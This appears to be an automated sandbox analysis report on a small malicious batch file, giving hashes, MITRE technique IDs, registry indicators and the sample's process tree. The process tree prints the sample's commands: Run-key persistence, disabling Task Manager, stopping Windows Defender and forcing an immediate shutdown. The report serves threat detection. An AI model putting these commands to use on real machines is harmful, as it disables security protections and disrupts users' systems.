132197cb5cce164f9f1341f2a77ed446d62c1b4e217ccc2491fdeedad305a7fd

Reason

Machine shutdown

General

Target

setup.bat
Size

598B
MD5

bc6d97e3920cc87c6c6dd10d978c89de
SHA1

7ea0f523a417a57bc610091b1d6304b3a4884c86
SHA256

132197cb5cce164f9f1341f2a77ed446d62c1b4e217ccc2491fdeedad305a7fd
SHA512

16460cfc765ad52eea00c1175394bd59c1ad3cbb8086d1646c15840689b45371c75ec8afe10980db469e2703b9c27dce30d25cb3f3e715589cde6a2787e55ef0

Score

8^/10

evasion persistence

Malware Config

Signatures

Disables Task Manager via registry modification
evasion

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat"	reg.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\.bat	cmd.exe
File opened for modification	C:\Windows\.bat	cmd.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "172"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
1984	reg.exe
3552	reg.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1188	shutdown.exe
Token: SeRemoteShutdownPrivilege	1188	shutdown.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4628	LogonUI.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 3804 wrote to memory of 1984	3804	cmd.exe	87
PID 3804 wrote to memory of 1984	3804	cmd.exe	87
PID 3804 wrote to memory of 3552	3804	cmd.exe	90
PID 3804 wrote to memory of 3552	3804	cmd.exe	90
PID 3804 wrote to memory of 3876	3804	cmd.exe	89
PID 3804 wrote to memory of 3876	3804	cmd.exe	89
PID 3804 wrote to memory of 3584	3804	cmd.exe	91
PID 3804 wrote to memory of 3584	3804	cmd.exe	91
PID 3584 wrote to memory of 1788	3584	net.exe	92
PID 3584 wrote to memory of 1788	3584	net.exe	92
PID 3804 wrote to memory of 1188	3804	cmd.exe	93
PID 3804 wrote to memory of 1188	3804	cmd.exe	93
PID 3804 wrote to memory of 1292	3804	cmd.exe	95
PID 3804 wrote to memory of 1292	3804	cmd.exe	95

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\setup.bat"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3804
- C:\Windows\system32\reg.exe
  reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:1984
- C:\Windows\system32\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
  2⤵
  PID:3876
- C:\Windows\system32\reg.exe
  reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d C:\Windows\.bat /f
  2⤵
  - Adds Run key to start application
  - Modifies registry key
  PID:3552
- C:\Windows\system32\net.exe
  net stop "WinDefend"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3584
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WinDefend"
    3⤵
    PID:1788
- C:\Windows\system32\shutdown.exe
  shutdown -s -t 00 -c "blackhost virus maker"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1188
- C:\Windows\system32\notepad.exe
  notepad.exe
  2⤵
  PID:1292

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3996855 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4628